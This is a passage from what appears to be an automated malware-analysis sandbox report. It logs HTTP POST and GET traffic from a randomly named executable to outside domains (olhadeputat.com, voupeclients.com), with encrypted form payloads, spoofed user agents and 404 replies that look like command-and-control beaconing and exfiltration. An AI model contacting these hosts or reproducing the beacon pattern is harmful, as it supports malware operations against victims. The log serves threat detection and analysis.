                                                            Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6+D3Q`N34oWH`4fT-e)]hR+UUc
                                                            Jul 3, 2024 17:38:28.196326971 CEST12INData Raw: f3 aa 7f 40 f8 0f 00 00 ff ff 0d 0a
                                                            Data Ascii: @
                                                            Jul 3, 2024 17:38:28.196336985 CEST17INData Raw: 63 0d 0a e3 e5 02 00 c9 45 66 f6 dd 04 00 00 0d 0a
                                                            Data Ascii: cEf
                                                            Jul 3, 2024 17:38:28.196383953 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            30192.168.11.2049804172.67.146.224807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:30.629728079 CEST1131OUTPOST /ieqg/ HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.olhadeputat.com
                                                            Referer: http://www.olhadeputat.com/ieqg/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 38 4d 77 54 4d 43 41 45 41 57 6d 68 79 35 68 34 75 39 6c 4e 61 59 61 35 4a 6c 44 61 58 53 34 2f 68 77 72 38 43 69 46 58 4b 61 6f 75 6a 6b 37 65 49 74 6b 56 6f 78 6a 67 45 70 4c 6d 71 50 62 35 48 59 4c 48 4d 64 59 68 54 43 57 4e 4f 64 51 70 4a 6a 31 35 75 66 66 58 67 38 35 54 6b 32 4c 6d 37 47 2b 38 4a 7a 48 44 4c 72 54 54 51 52 69 51 51 69 79 43 49 6d 57 6b 48 63 45 51 79 65 78 57 59 53 52 51 54 73 4d 72 48 4c 79 35 73 34 34 48 45 6b 70 45 6a 54 79 63 2f 77 64 71 45 6a 66 4e 35 74 44 31 71 55 78 54 79 32 53 44 2f 6f 36 6f 63 66 6e 6d 41 49 51 54 4b 4e 53 69 4b 6e 54 72 76 55 54 6b 46 34 43 48 32 78 47 53 53 44 49 41 58 78 2f 6f 50 48 67 73 44 44 47 56 71 47 6f 6c 45 4c 70 4d 63 57 61 63 43 52 71 6f 38 4c 55 35 56 69 6f 65 42 62 70 51 59 6a 30 53 6b 55 66 69 68 49 75 63 6a 70 6e 51 4e 63 43 57 69 44 74 6b 45 72 6c 2b 31 53 4c 77 32 47 73 76 56 53 41 64 4f 74 45 57 62 71 73 47 72 65 43 68 6e 64 44 5a 50 35 44 32 51 39 50 6f 4a 52 51 51 2f 44 67 6d 4d 34 33 4f 6f 76 4d 66 2f 4e 4f 46 4a 79 4d [TRUNCATED]
                                                            Data Ascii: vX=8MwTMCAEAWmhy5h4u9lNaYa5JlDaXS4/hwr8CiFXKaoujk7eItkVoxjgEpLmqPb5HYLHMdYhTCWNOdQpJj15uffXg85Tk2Lm7G+8JzHDLrTTQRiQQiyCImWkHcEQyexWYSRQTsMrHLy5s44HEkpEjTyc/wdqEjfN5tD1qUxTy2SD/o6ocfnmAIQTKNSiKnTrvUTkF4CH2xGSSDIAXx/oPHgsDDGVqGolELpMcWacCRqo8LU5VioeBbpQYj0SkUfihIucjpnQNcCWiDtkErl+1SLw2GsvVSAdOtEWbqsGreChndDZP5D2Q9PoJRQQ/DgmM43OovMf/NOFJyMgk19mjqQBsDg3Am8y1SUXR2Y4qOoSox9rAERjXSpvGAmxAKarlGt8jJjM95MTSoX/04XmcccAGEgjulnSeQFKZtr0Og4y8dgDiEsVMstFeatkpR4SzSVsD//vMO7ysVmlw88SCfshAwQBLmtR3QW/uSG9fGjhlJimotSg7o25CquIV535InL0ISXd2Imjw5otbYGrDqY=
                                                            Jul 3, 2024 17:38:30.869544029 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:30 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1jK54NQaEt9%2Bv7Nh1F4OqbZfDMN03EodjRGAd5%2BLfRUGpKR9Mvq8Inu5Vb6ltXgHIK5wOiiktP6CR7wXdQnSSl1gKXy2cLwt1PXmywpTc9wf9LanB37zR6aeOBFnpQIjgL6qUkq"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f685c9e8114d-ORD
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 32 61 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                                            Data Ascii: 2afTo0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6+D3Q`N34oWH`4fT-e)]hR+UUc@
                                                            Jul 3, 2024 17:38:30.869559050 CEST18INData Raw: 00 00 ff ff e3 e5 02 00 c9 45 66 f6 dd 04 00 00 0d 0a
                                                            Data Ascii: Ef
                                                            Jul 3, 2024 17:38:30.869570017 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.11.2049805172.67.146.224807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:33.302954912 CEST5156OUTPOST /ieqg/ HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.olhadeputat.com
                                                            Referer: http://www.olhadeputat.com/ieqg/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 38 4d 77 54 4d 43 41 45 41 57 6d 68 79 35 68 34 75 39 6c 4e 61 59 61 35 4a 6c 44 61 58 53 34 2f 68 77 72 38 43 69 46 58 4b 61 67 75 67 53 6e 65 4f 4f 63 56 72 78 6a 67 4b 4a 4c 6e 71 50 61 72 48 59 54 44 4d 64 6b 58 54 42 75 4e 50 4d 41 70 4a 51 64 35 69 2f 66 57 76 63 35 52 75 57 4c 49 37 47 79 6f 4a 7a 44 35 49 59 50 54 52 53 36 51 56 56 6d 46 47 57 57 59 48 63 45 4d 6a 4f 78 34 59 53 56 41 54 73 51 72 48 4a 32 35 73 4b 41 48 46 79 68 45 35 7a 79 62 30 51 64 66 4f 44 66 6f 35 74 58 68 71 55 78 44 79 33 6d 44 2f 76 4f 6f 64 59 7a 68 41 6f 51 54 4a 4e 53 68 41 48 66 33 76 56 37 73 46 37 65 48 32 32 61 53 54 6a 49 41 52 55 54 72 64 6e 67 71 53 7a 48 54 37 57 6b 39 45 4c 39 2b 63 54 69 63 42 68 75 6f 39 36 55 35 55 41 51 65 4d 62 70 4f 63 6a 30 37 78 45 66 45 68 49 65 36 6a 6f 48 6d 4e 63 6d 57 74 42 6c 6b 53 36 6c 35 7a 79 4b 35 6f 32 73 2b 52 53 63 72 4f 70 68 58 62 71 74 62 72 66 57 68 6e 73 7a 5a 4f 39 33 78 54 74 50 72 52 68 51 2f 6d 7a 73 34 4d 34 72 47 6f 76 6b 50 2f 4d 4b 46 50 69 4d [TRUNCATED]
                                                            Data Ascii: vX=8MwTMCAEAWmhy5h4u9lNaYa5JlDaXS4/hwr8CiFXKagugSneOOcVrxjgKJLnqParHYTDMdkXTBuNPMApJQd5i/fWvc5RuWLI7GyoJzD5IYPTRS6QVVmFGWWYHcEMjOx4YSVATsQrHJ25sKAHFyhE5zyb0QdfODfo5tXhqUxDy3mD/vOodYzhAoQTJNShAHf3vV7sF7eH22aSTjIARUTrdngqSzHT7Wk9EL9+cTicBhuo96U5UAQeMbpOcj07xEfEhIe6joHmNcmWtBlkS6l5zyK5o2s+RScrOphXbqtbrfWhnszZO93xTtPrRhQ/mzs4M4rGovkP/MKFPiMgv2llpaQGkjh6d28l1SQ6R3NFp/USoCFrFURiTyooVgm7EKarlGgHjJvM9JkTUP7/k/jmeccOGEg+ul7XeR90ZtbSOmYy/JEDhGJDastcaat/tR0FzW1eD7bVP9vytV2lmM8RSvsiHwRaPmgO3Q7CuX6tfFThkMKx5/WIgJy7KIWBaKauClnfPUbR/fa2wo8QI6ybQcXmEHmF5/WFdd5Sn817sYYDwdrSvGC3uSETOApr/Da8IDlnhLLm244WjL5qg2JYFGVspZcyg9gLm2Rrix1b3jNKZtfy5IHw2GLU6/+gfcukZQbr1MY98GY3LQKUevSVX7gKPiDrG+uzIbwmrp8+UQNXXcW2e5AjApX8TyNwQk8SAmL8TbhhRJ9uERquObDw2lwaXq1dpU8VFAgbirrg4PF2J3XHT4dwUmopbrfKcGIpS53fF9PLtSpSPOjpMVMCL64UuLH+t51RVkIKeKwCDZblRIWAc6q/hTpu+Yk3MdyyENXVkNs78/toa/eeWwbYotLZhKMc9z7lRbHql3E5M2dIIgdKgsZV4lmBi8NN01ZQg2d0jCKQDbHPrnmEs9oEib0Cz4ljgJd6QD4lDSB6XYWJdwOHVN1AHAV9uLz0mKQzPMDaQHzRrxGuY7/R9vIpS8z8/dSK+6c6bgKS0q9E6QHNlyPkJ [TRUNCATED]
                                                            Jul 3, 2024 17:38:33.303030968 CEST7734OUTData Raw: 7a 78 38 56 42 61 48 34 39 6f 7a 33 48 44 61 42 77 74 70 79 44 52 64 32 31 44 34 55 76 66 66 47 37 4f 62 57 57 6d 4b 64 6c 6d 51 73 53 6b 76 79 4e 35 6d 41 38 78 7a 30 51 6f 63 4d 75 77 32 4b 64 73 70 46 76 4b 79 48 51 71 54 45 45 5a 41 65 72 31
                                                            Data Ascii: zx8VBaH49oz3HDaBwtpyDRd21D4UvffG7ObWWmKdlmQsSkvyN5mA8xz0QocMuw2KdspFvKyHQqTEEZAer1gL7/rCVQKT1LK148mnL93FaC3bgNdF28r+EwXdWiIzmsRixmvXgIx5dhFfEuvTbg1DJfZuiN1syk4QRQAi7w6PkOxdY42kcOjMdf6AkbyhGu/Ot0mmXzpaagGExn8uBJmCY9lJdUZeyf59sUoNB+icaNy7fAxHwsK
                                                            Jul 3, 2024 17:38:33.422760010 CEST2578OUTData Raw: 4d 69 6f 31 42 70 4a 43 50 57 76 32 48 39 64 45 79 54 66 58 49 30 72 71 70 61 39 69 77 69 6a 54 34 79 6a 4a 59 4c 2b 64 4c 38 64 2f 62 72 39 53 4a 6e 77 68 46 63 67 79 2b 63 7a 43 62 50 2f 48 59 32 70 41 66 5a 68 30 53 71 73 73 70 52 72 67 57 44
                                                            Data Ascii: Mio1BpJCPWv2H9dEyTfXI0rqpa9iwijT4yjJYL+dL8d/br9SJnwhFcgy+czCbP/HY2pAfZh0SqsspRrgWD6W0Tsl0K2Bamp+JfDioDztW8tb2ge8p7757a2SzHBYlEh4MH8JHs1dvG9VvKmqQd1cN5MjCNwayoC6oO6QHW13CKdSI05XyxU+QUetaqRrWGT88GJrwXZuQUvC2ko7daQmMzTCGqmGrDTd2xkOTOyMSY1m9e2G1n3
                                                            Jul 3, 2024 17:38:33.422909975 CEST18046OUTData Raw: 4b 41 74 59 38 4d 32 57 45 75 70 46 53 43 6e 50 42 5a 30 62 4b 59 54 53 54 32 43 49 41 71 6c 54 6d 4d 63 4a 6f 5a 54 72 69 50 2f 73 70 63 4d 70 4b 70 50 45 72 47 77 74 4e 78 6b 34 52 7a 66 6c 55 30 62 30 69 30 73 36 33 32 44 51 34 43 2b 70 74 61
                                                            Data Ascii: KAtY8M2WEupFSCnPBZ0bKYTST2CIAqlTmMcJoZTriP/spcMpKpPErGwtNxk4RzflU0b0i0s632DQ4C+pta9EhV/5Xuz1sow/9+TIrgUHpl2izYOJL0I+h+l1di59xRnU9JJ/h+5b2ipyNUS6h2X6ptszlrjG2b4t4ccDT5fztzun8Xyt3XpaE05Gi+p1QtF/HJqvLLJ2VoLf2GUNcgIHJi/38xI59uAofcNfKd2M3GOT+FZBHeW
                                                            Jul 3, 2024 17:38:33.423089027 CEST2578OUTData Raw: 6f 41 6f 30 56 50 48 43 39 58 67 67 43 4e 42 65 31 47 2f 47 33 2b 76 2f 6f 62 77 33 57 71 44 49 76 46 62 71 2b 69 65 73 66 48 59 59 45 44 6a 51 44 39 31 75 50 54 75 4d 79 70 30 30 53 5a 75 7a 61 4b 72 75 34 53 6c 42 52 55 39 6c 62 78 53 4b 36 65
                                                            Data Ascii: oAo0VPHC9XggCNBe1G/G3+v/obw3WqDIvFbq+iesfHYYEDjQD91uPTuMyp00SZuzaKru4SlBRU9lbxSK6exow3rlSAiaphTNHiZatljfFsxqqwpT3f0UgbyJdK3xMq5GZTy+QGSpst6s5wZXg94J+dL8+6PmBPwcmk9tz9fTDtRJMNA3IDA+6Ka8XQLGQczySnpoUueUAP2Mkv93VY4P1eirwG/Irf22PyPXa1Q9HGEwLTQLjBb
                                                            Jul 3, 2024 17:38:33.423257113 CEST2578OUTData Raw: 4d 5a 52 33 57 76 2f 36 79 75 44 2f 70 68 71 63 61 38 51 64 42 79 73 2b 41 52 59 69 31 55 61 39 75 61 30 77 4e 34 65 68 78 58 78 4e 36 68 52 74 49 41 74 55 73 70 67 54 5a 75 63 76 7a 4e 5a 6b 73 2b 49 51 56 41 4e 6d 42 42 65 46 38 68 51 4c 4f 35
                                                            Data Ascii: MZR3Wv/6yuD/phqca8QdBys+ARYi1Ua9ua0wN4ehxXxN6hRtIAtUspgTZucvzNZks+IQVANmBBeF8hQLO5bMPTSprbeItN0+IRWN7Tk+EbrTXyK69jbTWtMUz6F3hifK/W+DEwmBdAsuJwloD69vqUV+mzL6tkZAenf9LOuLlVhilqznpAhwYmIm/kn0ctNwq2CZ/Dn5oF7XL6m6jbUccfxH8lN2kPOYDasjykkG+MLitNeMcc1
                                                            Jul 3, 2024 17:38:33.541802883 CEST2578OUTData Raw: 31 2b 6c 51 77 4f 53 75 39 7a 6b 33 4a 48 4f 37 42 54 2b 6b 58 39 59 59 41 44 59 66 2b 4c 31 47 6f 49 58 72 72 57 6c 71 6d 39 64 32 65 44 67 67 6d 56 74 56 47 4d 52 33 2b 44 56 55 33 76 71 49 61 4b 58 4f 71 57 4d 6c 66 46 34 6b 38 51 48 72 37 2f
                                                            Data Ascii: 1+lQwOSu9zk3JHO7BT+kX9YYADYf+L1GoIXrrWlqm9d2eDggmVtVGMR3+DVU3vqIaKXOqWMlfF4k8QHr7/19OfhwerZYZMlMzXUhfTfvPioVQNfowHVGeiTPs6RhdTIXg6rBlnj/AkSqAengp9snicLsMkuRl6Tgn9WwNOuv+eCwxRtlK50/9dx0pnyDd/4WvDM/Dad2L9izjzmdS5vbdq924zpyQOe9QuSNv70GMyzSh8iicur
                                                            Jul 3, 2024 17:38:33.541974068 CEST7734OUTData Raw: 71 67 77 65 4e 6a 34 48 6f 53 46 54 66 78 6c 7a 50 74 7a 4e 47 4c 79 6e 48 71 33 78 36 66 43 51 47 38 48 72 58 4f 4b 65 75 47 6a 6b 79 41 67 4d 75 36 37 55 6b 42 38 43 4e 62 55 4a 34 2f 73 33 54 57 57 2f 64 78 50 79 2f 74 2b 66 66 73 4c 47 66 47
                                                            Data Ascii: qgweNj4HoSFTfxlzPtzNGLynHq3x6fCQG8HrXOKeuGjkyAgMu67UkB8CNbUJ4/s3TWW/dxPy/t+ffsLGfGlWWRuJp+4AEWni9J/tEnHL2BrSpj93SKPg6GMs/1L1GDmWNchvrFnVp0ZqG9Hss7hFNIekV4Jy2nzIrshuPJx01u3pcxakcu4wXsnpPey+aZKi3hGQC1HV37AMbhAWacl9/q5mU3kVv9nVCccG3vTejSZkga8BC3f
                                                            Jul 3, 2024 17:38:33.542113066 CEST4546OUTData Raw: 48 51 6f 69 44 52 52 78 58 47 4d 6e 37 58 67 4d 2b 4a 68 39 77 49 59 70 31 64 66 58 69 6a 78 6c 63 31 57 56 62 76 2b 74 4e 79 64 61 79 57 45 5a 45 46 47 6c 6f 4e 33 6b 6c 73 56 50 65 73 4b 6d 63 39 2f 7a 44 4b 31 53 55 54 41 63 68 74 41 4e 4e 35
                                                            Data Ascii: HQoiDRRxXGMn7XgM+Jh9wIYp1dfXijxlc1WVbv+tNydayWEZEFGloN3klsVPesKmc9/zDK1SUTAchtANN5n2P03RItL9eemJo3yn+plemiW4/H/nNRiFOEXAAMLTiNuxYc6nhOPtbboWRlJHo14QNZj3gleLjyFMq131FQQsPGzbjHLa9rY9pYsU3Wu1VPYr39o+vI5+YJhHYpje0iYjln8f+AgSVVE9cU/YUCpVBXvwxhedlMH
                                                            Jul 3, 2024 17:38:33.806667089 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:33 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=af3yOc4FsGEsXja9rF3cTz%2Bz0sDDk6LAUq7u1aqqzadAb1mg4Nh4IFGrVkbRovh13cJjFeul137wPcXslkVRRWKQA0a7tsQkusFJc%2B3wERR2tI%2BqQn89EScdZ0bZV47rPpKZUo3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f6967c1861bb-ORD
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 32 61 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 54 df 6f 9b 30 10 7e 8f 94 ff e1 4a d4 b7 80 21 69 ba 86 10 a4 2d 4d d4 49 ed 56 ad d9 af 47 07 2e c1 2a d8 cc 76 48 58 d4 ff 7d 32 10 92 56 7d 18 48 9c 7d fa be bb fb ce 67 82 8b db af b3 e5 ef c7 39 24 3a 4b e1 f1 fb a7 fb cf 33 b0 6c 42 7e 0e 67 84 dc 2e 6f e1 d7 dd f2 e1 1e 3c c7 85 27 2d 59 a4 09 99 7f b1 c0 4a b4 ce 7d 42 76 bb 9d b3 1b 3a 42 6e c8 f2 1b d9 9b 28 9e a1 35 4b 5b 55 1c 27 d6 b1 15 76 3b 41 95 65 9f a5 5c 4d df 89 e0 8d c7 e3 9a 58 83 91 c6 c6 66 a8 29 18 b4 8d 7f b6 ac 98 5a 33 c1 35 72 6d 2f cb 1c 2d 88 ea dd d4 d2 b8 d7 c4 b0 27 10 25 54 2a d4 53 a6 84 7d 73 33 1a db 9e 45 4c 28 cd 74 8a e1 95 7b 05 36 2c 58 8a 20 24 c4 4c 62 a4 85 2c 81 0b 0d 6b b1 e5 b1 13 90 1a d9 ed 04 4a 97 29 82 2e 73 6c 32 44 4a 55 e5 5d d8 76 b7 b3 12 71 79 c8 a8 dc 30 ee bb 93 b5 e0 da 56 ec 2f fa ce 07 cc ea ed 9a 66 2c 2d fd 1f 28 63 ca 69 1f 3e 4a 46 d3 3e dc 61 5a a0 66 11 ed 83 a2 5c d9 0a 25 5b 4f 56 34 7a de 48 53 82 df 9b 57 cf e4 a5 db 59 33 4c [TRUNCATED]
                                                            Data Ascii: 2a3To0~J!i-MIVG.*vHX}2V}H}g9$:K3lB~g.o<'-YJ}Bv:Bn(5K[U'v;Ae\MXf)Z35rm/-'%T*S}s3EL(t{6,X $Lb,kJ).sl2DJU]vqy0V/f,-(ci>JF>aZf\%[OV4zHSWY3Lc8f|=x;+&maH{KgH*-r6s]_'t5-gab6GC90%Q>=<n>5srxUr4R4hARQ{+"o}+mTUnUP(a.I0 1+Mf:rF)UXap) H|.JleP-PBB6+D3Q`N34oWH`4fT-e)]hR+UUc@
                                                            Jul 3, 2024 17:38:33.806680918 CEST8INData Raw: f8 0f 00 00 ff ff 0d 0a
                                                            Data Ascii:
                                                            Jul 3, 2024 17:38:33.806690931 CEST22INData Raw: 63 0d 0a e3 e5 02 00 c9 45 66 f6 dd 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: cEf0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.11.2049806172.67.146.224807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:35.975142002 CEST523OUTGET /ieqg/?vX=xOYzP3dXeV68t5l1tdRGSaa1OFHMEwYl9QyrCyFOBp5kwxTuFOJ28A7LPoPnjOnXE6vKLrR6BAa5LOtmMQtvuaXLo91Bunju73veWhfgD7rjWCO2fFDcACU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.olhadeputat.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:38:36.214675903 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Wed, 03 Jul 2024 15:38:36 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: ASP.NET
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MqKTcn9iGMHyHMMA3WPH6z2vazS6V8iwTQZTLDlA6l05ZPCJUi%2BR3ZtfgHtDA4YrtNBqlJzzRC7EMqINVOhUSLacE49X8B3XPnbj4BfHYW2%2BcKsXBue3dVqFDhyXtZX%2FEha9yDR5"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 89d7f6a73d6be17c-ORD
                                                            alt-svc: h3=":443"; ma=86400
                                                            Data Raw: 34 64 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a [TRUNCATED]
                                                            Data Ascii: 4dd<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana
                                                            Jul 3, 2024 17:38:36.214689970 CEST554INData Raw: 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73
                                                            Data Ascii: , sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header">
                                                            Jul 3, 2024 17:38:36.214701891 CEST5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.11.204980744.227.65.245807100C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:38:41.597037077 CEST794OUTPOST /ouk5/ HTTP/1.1
                                                            Host: www.voupeclients.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.voupeclients.com
                                                            Referer: http://www.voupeclients.com/ouk5/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
